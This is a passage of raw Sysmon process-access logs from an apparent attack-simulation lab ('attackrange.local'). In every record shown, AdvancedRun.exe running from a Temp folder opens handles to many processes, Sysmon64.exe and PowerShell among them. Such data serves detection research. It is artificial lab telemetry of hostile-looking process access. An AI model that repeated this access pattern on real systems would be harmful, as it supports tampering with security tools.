AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011689Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011688Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011687Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011686Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011685Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011684Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004011683Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011682Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011681Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011680Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011679Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011678Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011677Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011676Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011675Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 